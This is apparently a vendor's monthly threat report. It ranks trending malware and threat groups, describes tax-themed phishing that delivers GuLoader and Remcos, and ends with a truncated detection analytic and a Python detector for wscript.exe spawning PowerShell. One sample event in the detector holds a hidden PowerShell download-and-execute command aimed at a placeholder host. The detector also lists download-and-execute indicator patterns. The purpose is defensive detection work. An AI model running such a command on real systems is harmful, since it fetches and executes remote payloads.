⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Qbot—ranked as last year’s number 1 threat in our newly released Threat Detection Report—also takes the number 1 spot in this month’s top 10 after a very active February. We observed Qbot being delivered by multiple affiliate groups that act as initial access brokers, TA577 and TA570 in particular. Both of these threats appear on our top 10 list this month, with TA577 at number 3 and TA570 tied for number 6 with Impacket and Gamarue.
A change in our threat tracking led to a newcomer in the top 10. Coming in at number 4, Dock2Master is a threat that we track as a precursor to Shlayer. In the past, we included it in Shlayer activity, but now we are tracking it separately since we frequently see only Dock2Master with no progression to Shlayer. Dock2Master is macOS fraud activity with a primary goal of showing ads to users or redirecting users to the Dock2Master site.
Our other newcomer to the top 10 list, coming in at number 9, is Danabot. Danabot is a modular banking trojan that saw increased use in February 2023.
Tax-themed phishing emails delivering GuLoader
On February 28, we published an insight detailing the ways adversaries take advantage of tax season to make their phishing campaigns more effective. We saw a specific example last month, with tax-themed phishing emails delivering GuLoader. GuLoader is a malicious downloader that adversaries use to distribute shellcode and deliver follow-on payloads.
In February, we saw Remcos delivered as the payload following GuLoader. Remcos is a remote access tool (RAT) that adversaries use to gain persistent remote access to a victim’s endpoint. After Remcos is successfully installed, adversaries can choose from a number of options, including surveilling the victim system, downloading additional malware, and sending host data back to a command and control (C2) server.
We encourage organizations to make users aware of the specific risk of malware delivery via fake tax and financial documents. Users should be wary of unexpected tax-related emails with attachments, especially those purporting to be from the IRS. If a user opens the phishing attachment, one way to mitigate malicious scripts is to create a Group Policy Object (GPO) to change the default behavior of commonly misused script extensions, making them behave like benign text files that open in Notepad and do not automatically execute.
For more information on this activity, including detailed guidance to create a GPO to change script behavior, see the Intelligence Insight.
wscript.exe launching PowerShell
The following detection analytic will identify a script—wscript.exe in this case—launching PowerShell to download and execute a payload. Malicious phishing attachments, including GuLoader attachments, can leverage wscript.exe to load and execute malicious PowerShell commands, ultimately downloading and executing staged payloads if not detected.
parent_process == (
process == (
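As an added illustration of the analytic above (this is not Red Canary's detection logic), the following Python evaluates the same three conditions, parent is wscript.exe, child is PowerShell, and the command line carries download/execute indicators, against constructed process-creation events; the field names and the indicator list are assumptions, and pwsh.exe is included alongside powershell.exe.

```python
# Added example, not the page's own analytic: detect wscript.exe spawning PowerShell
# with download-and-execute behaviour, evaluated over constructed telemetry.
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    # Field names are assumptions; map them to your EDR's process-creation schema.
    parent_process: str
    process: str
    command_line: str


# Command-line fragments that commonly indicate PowerShell fetching and running
# remote content. Extend this list from your own telemetry; it is not exhaustive.
DOWNLOAD_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"invoke-expression", r"\biex\b", r"start-bitstransfer",
]
DOWNLOAD_RE = re.compile("|".join(DOWNLOAD_PATTERNS), re.IGNORECASE)


def _basename(path: str) -> str:
    """Return the lowercase image name regardless of the directory it ran from."""
    return path.lower().rsplit("\\", 1)[-1]


def is_wscript_to_powershell_download(ev: ProcessEvent) -> bool:
    """True when wscript.exe launched PowerShell with download/execute indicators."""
    if _basename(ev.parent_process) != "wscript.exe":
        return False
    if _basename(ev.process) not in ("powershell.exe", "pwsh.exe"):
        return False
    return DOWNLOAD_RE.search(ev.command_line) is not None


def detect(events):
    """Return the events that match the analytic, in input order."""
    return [ev for ev in events if is_wscript_to_powershell_download(ev)]


# Constructed sample events (not real campaign data); only the first should fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS,
                 "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell -c Get-Process"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c echo done"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS, "powershell -c Write-Host done"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT:", hit.parent_process, "->", hit.process, "|", hit.command_line)
```

The last sample event shows why the command-line condition matters: wscript.exe launching PowerShell alone is noisy in environments with legitimate logon scripts, so the analytic fires only when download or execution indicators are also present.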